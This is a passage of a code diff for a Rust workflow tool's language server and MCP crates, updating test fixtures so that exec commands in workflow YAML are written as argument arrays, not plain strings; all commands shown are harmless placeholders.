-    let text = "nika: v1\ntasks:\n  - id: a\n    exec: {command: ls}\n  - id: b\n    when: ${{ tasks.ghost.";
+    let text = "nika: v1\ntasks:\n  - id: a\n    exec: {command: [\"ls\"]}\n  - id: b\n    when: ${{ tasks.ghost.";
     let got = labels(&completion(text, text.len()));
     assert!(
         got.contains(&"output".to_owned()) && got.contains(&"status".to_owned()),
@@ -943,7 +943,7 @@ fn items_inside_a_schema_keeps_the_keyset() {
 
 #[test]
 fn task_fields_survive_outside_schema() {
-    let text = "nika: v1\ntasks:\n  - id: a\n    exec:\n      command: ls\n  - id: b\n    ";
+    let text = "nika: v1\ntasks:\n  - id: a\n    exec:\n      command: [\"ls\"]\n  - id: b\n    ";
     let got = labels(&completion(text, text.len()));
     assert!(
         got.contains(&"depends_on".to_owned()),
@@ -953,7 +953,7 @@ fn task_fields_survive_outside_schema() {
 
 // ─── the wave-2 lanes: for_each/when islands · skills list ──────────────────
 
-const FLOW_DOC: &str = "nika: v1\nworkflow: w\nvars:\n  urls:\n    type: array\n    default: []\n  topic: \"rust\"\ntasks:\n  - id: gather\n    exec:\n      command: ls\n  - id: fan\n    depends_on: [gather]\n    for_each: \n    exec:\n      command: echo\n  - id: last\n    depends_on: [fan]\n    exec:\n      command: true\n";
+const FLOW_DOC: &str = "nika: v1\nworkflow: w\nvars:\n  urls:\n    type: array\n    default: []\n  topic: \"rust\"\ntasks:\n  - id: gather\n    exec:\n      command: [\"ls\"]\n  - id: fan\n    depends_on: [gather]\n    for_each: \n    exec:\n      command: [\"echo\"]\n  - id: last\n    depends_on: [fan]\n    exec:\n      command: [\"true\"]\n";
 
 #[test]
 fn for_each_offers_typed_arrays_first_then_upstream_cycle_safe() {

--- a/crates/nika-lsp/src/analysis/definition.rs
+++ b/crates/nika-lsp/src/analysis/definition.rs
@@ -308,7 +308,7 @@ mod tests {
         // `island_start + search_from + rel`. The FIRST resolves to `aaa`,
         // the SECOND to `bbb`; a broken advance/kw_at would mis-resolve or
         // miss the second.
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: aaa\n    exec: { command: \"x\" }\n  - id: bbb\n    exec: { command: \"${{ tasks.aaa == tasks.bbb }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: aaa\n    exec: { command: [\"x\"] }\n  - id: bbb\n    exec: { command: [\"${{ tasks.aaa == tasks.bbb }}\"] }\n";
         let index = LineIndex::new(yaml);
         let aaa_id = yaml.find("id: aaa").map(|p| p + "id: ".len()).expect("aaa");
         let bbb_id = yaml.find("id: bbb").map(|p| p + "id: ".len()).expect("bbb");
@@ -374,7 +374,7 @@ mod tests {
         );
         // also through the public surface for good measure.
         let yaml =
-            "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"${{ tasks. }}\" }\n";
+            "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"${{ tasks. }}\"] }\n";
         assert!(definition(&uri(), yaml, yaml.find("tasks.").unwrap()).is_none());
     }
 
@@ -385,7 +385,7 @@ mod tests {
         // requires the NEXT byte; if it checked the current byte instead
         // (`i * 1`), a lone `}` would close the island early and `tasks.a`
         // (after the lone `}`) would be unreachable.
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"${{ x } tasks.a }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { shell: \"${{ x } tasks.a }}\" }\n";
         let index = LineIndex::new(yaml);
         let a_id = yaml.find("id: a").map(|p| p + "id: ".len()).expect("a id");
         let at = yaml.find("tasks.a }}").expect("ref") + "tasks.".len();
@@ -420,7 +420,7 @@ mod tests {
             "tasks.x after the quoted `}}` resolves"
         );
         // end-to-end through the public surface.
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: x\n    exec: { command: \"${{ 'a}}b' + tasks.x }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: x\n    exec: { shell: \"${{ 'a}}b' + tasks.x }}\" }\n";
         let index = LineIndex::new(yaml);
         let x_id = yaml.find("id: x").map(|p| p + "id: ".len()).expect("x id");
         let at = yaml.rfind("tasks.x").expect("ref") + "tasks.".len();
@@ -472,7 +472,7 @@ mod tests {
 
     #[test]
     fn depends_on_item_resolves_to_the_exact_full_id_range() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: \"x\" }\n  - id: save\n    depends_on: [extract]\n    exec: { command: \"y\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: [\"x\"] }\n  - id: save\n    depends_on: [extract]\n    exec: { command: [\"y\"] }\n";
         // cursor on the `extract` inside depends_on
         let dep_offset = yaml.rfind("extract").expect("dep ref") + 1;
         let loc = definition(&uri(), yaml, dep_offset).expect("resolves");
@@ -496,7 +496,7 @@ mod tests {
         // The dep token is widened from the parser's POINT span. The cursor
         // resolves on the FIRST byte through the LAST byte of `extract`, but
         // NOT on the `[` one byte before nor the `]` one byte after.
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: \"x\" }\n  - id: save\n    depends_on: [extract]\n    exec: { command: \"y\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: [\"x\"] }\n  - id: save\n    depends_on: [extract]\n    exec: { command: [\"y\"] }\n";
         let tok = yaml.rfind("extract").expect("dep ref");
         // one byte BEFORE the token (`[`): no resolution.
         assert!(
@@ -522,7 +522,7 @@ mod tests {
 
     #[test]
     fn template_tasks_ref_resolves_to_the_exact_full_id_range() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    infer: { prompt: \"hi\", max_tokens: 10 }\n  - id: use_it\n    depends_on: [extract]\n    exec: { command: \"echo ${{ tasks.extract.output }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    infer: { prompt: \"hi\", max_tokens: 10 }\n  - id: use_it\n    depends_on: [extract]\n    exec: { command: [\"echo\", \"${{ tasks.extract.output }}\"] }\n";
         // cursor inside `tasks.extract` in the template
         let ref_at = yaml.find("tasks.extract").expect("tpl ref") + "tasks.ex".len();
         let loc = definition(&uri(), yaml, ref_at).expect("resolves");
@@ -543,7 +543,7 @@ mod tests {
         // Two `${{ … }}` islands · the cursor in the SECOND island's
         // `tasks.b` resolves to `b` (the islands loop must continue past the
         // first island, and `find_close` must close each correctly).
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n  - id: b\n    exec: { command: \"x\" }\n  - id: c\n    depends_on: [a, b]\n    exec: { command: \"${{ tasks.a }} and ${{ tasks.b }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n  - id: b\n    exec: { command: [\"x\"] }\n  - id: c\n    depends_on: [a, b]\n    exec: { command: [\"${{ tasks.a }}\", \"and\", \"${{ tasks.b }}\"] }\n";
         let second = yaml.rfind("tasks.b").expect("2nd island ref") + "tasks.".len();
         let loc = definition(&uri(), yaml, second).expect("resolves in island 2");
         let index = LineIndex::new(yaml);
@@ -560,7 +560,7 @@ mod tests {
         // The cursor on the `tasks.` keyword itself (not just the id) also
         // resolves — `template_task_target` accepts `kw_at..id_end`. The byte
         // one PAST the id end does NOT (it's `.output`, outside the id).
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: \"x\" }\n  - id: u\n    exec: { command: \"${{ tasks.extract.output }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: [\"x\"] }\n  - id: u\n    exec: { command: [\"${{ tasks.extract.output }}\"] }\n";
         let kw = yaml.find("tasks.extract").expect("ref");
         // cursor on the `t` of `tasks.` resolves.
         assert!(
@@ -634,7 +634,7 @@ mod tests {
 
     #[test]
     fn cursor_not_on_a_reference_returns_none() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n";
         // cursor on the `command` keyword — not a task reference
         let cmd_at = yaml.find("command").expect("kw");
         assert!(definition(&uri(), yaml, cmd_at).is_none());
@@ -643,7 +643,7 @@ mod tests {
     #[test]
     fn ref_to_undefined_task_returns_none() {
         // depends_on a ghost — no id span to jump to
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: [\"x\"] }\n";
         let ghost_at = yaml.find("ghost").expect("ref") + 1;
         assert!(definition(&uri(), yaml, ghost_at).is_none());
     }
@@ -715,7 +715,7 @@ mod tests {
         );
         // and it resolves the ref inside it (proves the even-run path keeps
         // the island live, exercising backslash_run_is_odd's `% 2` parity).
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: foo\n    exec: { command: \"x ${{ tasks.foo }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: foo\n    exec: { command: [\"x\", \"${{ tasks.foo }}\"] }\n";
         let at = yaml.rfind("tasks.foo").expect("ref") + "tasks.".len();
         assert!(
             definition(&uri(), yaml, at).is_some(),
@@ -739,7 +739,7 @@ mod tests {
     #[test]
     fn tasks_substring_mid_identifier_is_not_a_reference() {
         // `mytasks.foo` contains `tasks.` but is not a task reference.
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: foo\n    exec: { command: \"echo ${{ mytasks.foo }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: foo\n    exec: { command: [\"echo\", \"${{ mytasks.foo }}\"] }\n";
         let at = yaml.find("mytasks.foo").expect("substr") + "mytasks.fo".len();
         assert!(
             definition(&uri(), yaml, at).is_none(),
@@ -752,7 +752,7 @@ mod tests {
     /// member resolves nowhere (no invented target).
     #[test]
     fn member_ref_jumps_to_its_declaration() {
-        let text = "nika: v1\nworkflow: w\nvars:\n  city: \"paris\"\nenv:\n  REGION: eu\nsecrets:\n  api_key:\n    source: env\n    key: K\ntasks:\n  - id: a\n    exec: { command: \"echo ${{ vars.city }} ${{ env.REGION }} ${{ secrets.api_key }}\" }\n";
+        let text = "nika: v1\nworkflow: w\nvars:\n  city: \"paris\"\nenv:\n  REGION: eu\nsecrets:\n  api_key:\n    source: env\n    key: K\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"${{ vars.city }}\", \"${{ env.REGION }}\", \"${{ secrets.api_key }}\"] }\n";
         let uri: Uri = "file:///w.nika.yaml".parse().expect("uri");
         let decl_line = |needle: &str| {
             let at = text.find(needle).expect(needle);

--- a/crates/nika-lsp/src/analysis/diagnostics.rs
+++ b/crates/nika-lsp/src/analysis/diagnostics.rs
@@ -298,7 +298,7 @@ mod tests {
     #[test]
     fn clean_workflow_has_no_error_diagnostics() {
         let yaml =
-            "nika: v1\nworkflow: clean\ntasks:\n  - id: a\n    exec: { command: \"echo hi\" }\n";
+            "nika: v1\nworkflow: clean\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"hi\"] }\n";
         let diags = diags_of(yaml);
         let errors: Vec<_> = diags
             .iter()
@@ -310,7 +310,7 @@ mod tests {
     #[test]
     fn unknown_dep_yields_dag002_error_with_span() {
         // depends_on a ghost task — NIKA-DAG-002, carries a span.
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: [\"x\"] }\n";
         let diags = diags_of(yaml);
         let dag = diags
             .iter()
@@ -371,7 +371,7 @@ mod tests {
         // finding renders with the EXACT gate code (not the generic
         // NIKA-DAG-GATE fallback, not an empty/garbage string), ERROR
         // severity, the `nika` source, and a span on the `when:` expression.
-        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/c\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' && tasks.a.status == 'failure' }}\n    exec: { command: \"true\" }\n";
+        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/c\ntasks:\n  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status == 'success' && tasks.a.status == 'failure' }}\n    exec: { command: [\"true\"] }\n";
         let diags = diags_of(yaml);
         let dead = diags
             .iter()
@@ -399,7 +399,7 @@ mod tests {
         // `!= 'failed'` flags the wrong status literal — a BadStatusLiteral
         // gate finding with its OWN code (deleting the match arm would
         // degrade it to the generic NIKA-DAG-GATE fallback).
-        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/c\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status != 'failed' }}\n    exec: { command: \"true\" }\n";
+        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/c\ntasks:\n  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    when: ${{ tasks.a.status != 'failed' }}\n    exec: { command: [\"true\"] }\n";
         let diags = diags_of(yaml);
         let bad = diags
             .iter()

--- a/crates/nika-lsp/src/analysis/graph.rs
+++ b/crates/nika-lsp/src/analysis/graph.rs
@@ -43,7 +43,7 @@ mod tests {
     use nika_schema::{FileId, ParseMode, parse};
 
     // the diamond: a → {b, c} → d
-    const DIAMOND: &str = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"x\" }\n  - id: c\n    depends_on: [a]\n    exec: { command: \"x\" }\n  - id: d\n    depends_on: [b, c]\n    exec: { command: \"x\" }\n";
+    const DIAMOND: &str = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"x\"] }\n  - id: c\n    depends_on: [a]\n    exec: { command: [\"x\"] }\n  - id: d\n    depends_on: [b, c]\n    exec: { command: [\"x\"] }\n";
 
     #[test]
     fn downstream_of_the_root_is_everything_else() {

--- a/crates/nika-lsp/src/analysis/hover.rs
+++ b/crates/nika-lsp/src/analysis/hover.rs
@@ -395,7 +395,7 @@ mod tests {
 
     #[test]
     fn hover_on_top_level_key() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n";
         let at = yaml.find("tasks").expect("key") + 1;
         let h = hover(yaml, at).expect("hover present");
         assert!(body(&h).contains("**`tasks`**"));
@@ -404,7 +404,7 @@ mod tests {
 
     #[test]
     fn hover_on_task_field() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: []\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: []\n    exec: { command: [\"x\"] }\n";
         let at = yaml.find("depends_on").expect("field") + 3;
         let h = hover(yaml, at).expect("hover present");
         assert!(body(&h).contains("**`depends_on`**"));
@@ -428,14 +428,14 @@ mod tests {
         // reference, not a declaration → no hover. (A task id DEFINITION
         // now answers with its DAG card — pinned in its own test below.)
         let yaml =
-            "nika: v1\nworkflow: w\ntasks:\n  - id: my_task\n    exec: { command: \"xyzzy\" }\n";
+            "nika: v1\nworkflow: w\ntasks:\n  - id: my_task\n    exec: { command: [\"xyzzy\"] }\n";
         let at = yaml.find("xyzzy").expect("command value") + 2;
         assert!(hover(yaml, at).is_none());
     }
 
     #[test]
     fn hover_on_depends_on_ref_shows_target_task_and_verb() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: greet\n    infer: { prompt: \"hi\", max_tokens: 5 }\n  - id: use_it\n    depends_on: [greet]\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: greet\n    infer: { prompt: \"hi\", max_tokens: 5 }\n  - id: use_it\n    depends_on: [greet]\n    exec: { command: [\"x\"] }\n";
         // the LAST `greet` is the depends_on reference (the first is the id)
         let at = yaml.rfind("greet").expect("dep ref") + 1;
         let h = hover(yaml, at).expect("hover on the reference");
@@ -453,7 +453,7 @@ mod tests {
 
     #[test]
     fn hover_on_template_tasks_ref_shows_target_task_and_verb() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: greet\n    infer: { prompt: \"hi\", max_tokens: 5 }\n  - id: use_it\n    exec: { command: \"echo ${{ tasks.greet.output }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: greet\n    infer: { prompt: \"hi\", max_tokens: 5 }\n  - id: use_it\n    exec: { command: [\"echo\", \"${{ tasks.greet.output }}\"] }\n";
         let at = yaml.find("tasks.greet").expect("tpl ref") + "tasks.gr".len();
         let h = hover(yaml, at).expect("hover on the template reference");
         assert!(body(&h).contains("**task `greet`**"), "{}", body(&h));
@@ -540,7 +540,7 @@ mod tests {
     #[test]
     fn hover_just_past_word_still_resolves() {
         // caret at the byte right after `exec` — common end-of-word position
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n";
         let after = yaml.find("exec").expect("verb") + "exec".len();
         let h = hover(yaml, after).expect("hover");
         assert!(body(&h).contains("**`exec`**"));
@@ -596,7 +596,7 @@ mod tests {
     /// The diamond: a → {b, c} → d.
     #[test]
     fn hover_on_task_decl_shows_the_dag_card() {
-        let text = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"x\" }\n  - id: c\n    depends_on: [a]\n    exec: { command: \"x\" }\n  - id: d\n    depends_on: [b, c]\n    exec: { command: \"x\" }\n";
+        let text = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"x\"] }\n  - id: c\n    depends_on: [a]\n    exec: { command: [\"x\"] }\n  - id: d\n    depends_on: [b, c]\n    exec: { command: [\"x\"] }\n";
         let a = hover(text, text.find("- id: a").expect("a") + 7).expect("card for a");
         let ab = body(&a);
         assert!(ab.contains("wave 1/3"), "{ab}");
@@ -621,7 +621,7 @@ mod tests {
     /// lane already tells that story with a span and a code.
     #[test]
     fn hover_on_task_decl_in_a_cycle_stays_silent() {
-        let text = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [b]\n    exec: { command: \"x\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"x\" }\n";
+        let text = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [b]\n    exec: { command: [\"x\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"x\"] }\n";
         assert!(hover(text, text.find("- id: a").expect("a") + 7).is_none());
     }
 
@@ -630,7 +630,7 @@ mod tests {
     /// · env (its value).
     #[test]
     fn hover_on_member_refs_shows_the_declaration_cards() {
-        let text = "nika: v1\nworkflow: w\nvars:\n  city:\n    type: string\n    required: true\n    default: paris\n    description: target city\nenv:\n  REGION: eu\nsecrets:\n  api_key:\n    source: env\n    key: K\ntasks:\n  - id: a\n    exec: { command: \"echo ${{ vars.city }} ${{ env.REGION }} ${{ secrets.api_key }}\" }\n";
+        let text = "nika: v1\nworkflow: w\nvars:\n  city:\n    type: string\n    required: true\n    default: paris\n    description: target city\nenv:\n  REGION: eu\nsecrets:\n  api_key:\n    source: env\n    key: K\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"${{ vars.city }}\", \"${{ env.REGION }}\", \"${{ secrets.api_key }}\"] }\n";
         let h = hover(text, text.find("vars.city").expect("ref") + 6).expect("var card");
         let b = body(&h);
         assert!(

--- a/crates/nika-lsp/src/analysis/scope.rs
+++ b/crates/nika-lsp/src/analysis/scope.rs
@@ -217,7 +217,7 @@ pub(super) fn in_block_list_item(text: &str, offset: usize, key: &str) -> bool {
 mod tests {
     use super::*;
 
-    const DOC: &str = "nika: v1\nworkflow: w\ntasks:\n  - id: fetch_article\n    invoke:\n      tool: nika:fetch\n      args:\n        url: \"https://x\"\n        \n  - id: second\n    exec:\n      command: ls\n";
+    const DOC: &str = "nika: v1\nworkflow: w\ntasks:\n  - id: fetch_article\n    invoke:\n      tool: nika:fetch\n      args:\n        url: \"https://x\"\n        \n  - id: second\n    exec:\n      command: [\"ls\"]\n";
 
     #[test]
     fn current_task_is_the_nearest_id_above() {

--- a/crates/nika-lsp/src/analysis/symbols.rs
+++ b/crates/nika-lsp/src/analysis/symbols.rs
@@ -207,7 +207,7 @@ mod tests {
 
     #[test]
     fn workflow_root_named_by_id() {
-        let yaml = "nika: v1\nworkflow: my-flow\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: my-flow\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n";
         let syms = document_symbols(yaml);
         assert_eq!(syms.len(), 1, "one root");
         assert_eq!(syms[0].name, "my-flow");
@@ -230,7 +230,7 @@ mod tests {
 
     #[test]
     fn task_selection_range_is_the_id_span() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: hello\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: hello\n    exec: { command: [\"x\"] }\n";
         let index = LineIndex::new(yaml);
         let syms = document_symbols(yaml);
         let task = &syms[0].children.as_ref().expect("children")[0];
@@ -254,7 +254,7 @@ mod tests {
         // This pins union_range + min_pos (start) + max_pos (end) to exact
         // positions — Default::default() (0,0)..(0,0), a flipped min_pos
         // (returns (5,6)) or a flipped max_pos (returns (5,2)) all diverge.
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: aa\n    exec: { command: \"x\" }\n  - id: bbb\n    exec: { command: \"y\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: aa\n    exec: { command: [\"x\"] }\n  - id: bbb\n    exec: { command: [\"y\"] }\n";
         let syms = document_symbols(yaml);
         let children = syms[0].children.as_ref().expect("children");
         assert_eq!(children[0].range, rng(3, 6, 5, 2), "child 0 enclosing");
@@ -272,7 +272,7 @@ mod tests {
         // id span. The task span is (3,6)..(5,0), the id span is the point
         // (3,8) · the union keeps the wider span. min_pos((3,6),(3,8))=(3,6),
         // max_pos((5,0),(3,8))=(5,0) → (3,6)..(5,0).
-        let yaml = "nika: v1\nworkflow: my-flow\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: my-flow\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n";
         let syms = document_symbols(yaml);
         let child = &syms[0].children.as_ref().expect("children")[0];
         assert_eq!(
@@ -307,7 +307,7 @@ mod tests {
 
     #[test]
     fn all_four_verbs_render() {
-        let yaml = "nika: v1\nworkflow: w\nmodel: ollama/m\ntasks:\n  - id: i\n    infer: { prompt: \"p\", max_tokens: 5 }\n  - id: e\n    exec: { command: \"x\" }\n  - id: v\n    invoke: { tool: \"nika:read\", args: { path: \"./p\" } }\n  - id: g\n    agent: { prompt: \"p\", tools: [\"nika:read\"], max_turns: 2 }\n";
+        let yaml = "nika: v1\nworkflow: w\nmodel: ollama/m\ntasks:\n  - id: i\n    infer: { prompt: \"p\", max_tokens: 5 }\n  - id: e\n    exec: { command: [\"x\"] }\n  - id: v\n    invoke: { tool: \"nika:read\", args: { path: \"./p\" } }\n  - id: g\n    agent: { prompt: \"p\", tools: [\"nika:read\"], max_turns: 2 }\n";
         let syms = document_symbols(yaml);
         let verbs: Vec<&str> = syms[0]
             .children
@@ -324,7 +324,7 @@ mod tests {
     /// range on the declaring name (the go-to-definition twin).
     #[test]
     fn outline_carries_vars_env_secrets_and_tasks() {
-        let text = "nika: v1\nworkflow: w\nvars:\n  city:\n    type: string\n  out: \"./o\"\nenv:\n  REGION: eu\nsecrets:\n  api_key: { source: vault, key: k }\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n";
+        let text = "nika: v1\nworkflow: w\nvars:\n  city:\n    type: string\n  out: \"./o\"\nenv:\n  REGION: eu\nsecrets:\n  api_key: { source: vault, key: k }\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n";
         let syms = document_symbols(text);
         assert_eq!(syms.len(), 1, "one workflow root");
         let children = syms[0].children.as_ref().expect("children");

--- a/crates/nika-lsp/src/server.rs
+++ b/crates/nika-lsp/src/server.rs
@@ -411,7 +411,7 @@ mod tests {
     #[test]
     fn document_symbol_request_returns_nested_tree() {
         let mut docs = BTreeMap::new();
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n";
         open(&mut docs, yaml);
         let params = DocumentSymbolParams {
             text_document: TextDocumentIdentifier::new(uri()),
@@ -498,7 +498,7 @@ mod tests {
     #[test]
     fn diagnose_broken_workflow_yields_an_error() {
         let doc = Document::new(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: \"x\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: [\"x\"] }\n",
         );
         let diags = diagnose(&doc);
         assert!(
@@ -569,10 +569,10 @@ mod tests {
         let mut docs: Docs = BTreeMap::new();
         open(
             &mut docs,
-            "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n",
         );
         // change to a BROKEN workflow (depends on a ghost) → an error diag.
-        let broken = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: \"x\" }\n";
+        let broken = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: [\"x\"] }\n";
         handle_notification(&server, change_note(broken), &mut docs).expect("handled");
         assert_eq!(
             docs.get(uri_key(&uri())).map(Document::text),
@@ -908,11 +908,11 @@ mod canary {
             .expect("initialized");
 
         // 1) A broken workflow → a NIKA-* error diagnostic published.
-        let broken = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: \"x\" }\n";
+        let broken = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: [\"x\"] }\n";
         did_open(&client, broken);
 
         // 2) A clean workflow with a verb, a dependency and a template ref.
-        let hello = "nika: v1\nworkflow: hello\ntasks:\n  - id: greet\n    infer: { prompt: \"hi\", max_tokens: 10 }\n  - id: use_it\n    depends_on: [greet]\n    exec: { command: \"echo ${{ tasks.greet.output }}\" }\n";
+        let hello = "nika: v1\nworkflow: hello\ntasks:\n  - id: greet\n    infer: { prompt: \"hi\", max_tokens: 10 }\n  - id: use_it\n    depends_on: [greet]\n    exec: { command: [\"echo\", \"${{ tasks.greet.output }}\"] }\n";
         let hello_uri = Uri::from_str("file:///hello.nika.yaml").expect("uri");
         open_uri(&client, &hello_uri, hello);
         let idx = crate::analysis::position::LineIndex::new(hello);

--- a/crates/nika-mcp/src/protocol.rs
+++ b/crates/nika-mcp/src/protocol.rs
@@ -218,7 +218,7 @@ mod tests {
 
     #[test]
     fn tools_call_runs_the_tool() {
-        let wf = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    exec: { command: \"echo hi\" }\n";
+        let wf = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"hi\"] }\n";
         let resp = handle(&json!({
             "jsonrpc": "2.0", "id": 3, "method": "tools/call",
             "params": { "name": "nika_check", "arguments": { "workflow": wf } }
@@ -238,7 +238,7 @@ mod tests {
         // A workflow with findings comes back isError:true (the model
         // sees the findings AND a repair-on-error harness fires) — the
         // MCP lane must agree with the CLI's exit-2-on-dirty.
-        let wf = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: \"x\" }\n";
+        let wf = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: [\"x\"] }\n";
         let resp = handle(&json!({
             "jsonrpc": "2.0", "id": 7, "method": "tools/call",
             "params": { "name": "nika_check", "arguments": { "workflow": wf } }

--- a/crates/nika-mcp/src/tools.rs
+++ b/crates/nika-mcp/src/tools.rs
@@ -373,7 +373,7 @@ mod tests {
 
     #[test]
     fn check_a_clean_workflow_is_ok() {
-        let wf = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    exec: { command: \"echo hi\" }\n";
+        let wf = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"hi\"] }\n";
         let out = execute("nika_check", &json!({ "workflow": wf })).expect("ran");
         assert!(out.contains("clean"), "{out}");
     }
@@ -384,7 +384,7 @@ mod tests {
         // Dirty is an `Err` (→ isError:true) so a wired agent's repair
         // loop triggers, mirroring the CLI's exit-2-on-dirty; the full
         // report still rides the text so the model repairs from it.
-        let wf = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: \"x\" }\n";
+        let wf = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    depends_on: [ghost]\n    exec: { command: [\"x\"] }\n";
         let err = execute("nika_check", &json!({ "workflow": wf })).expect_err("dirty is an error");
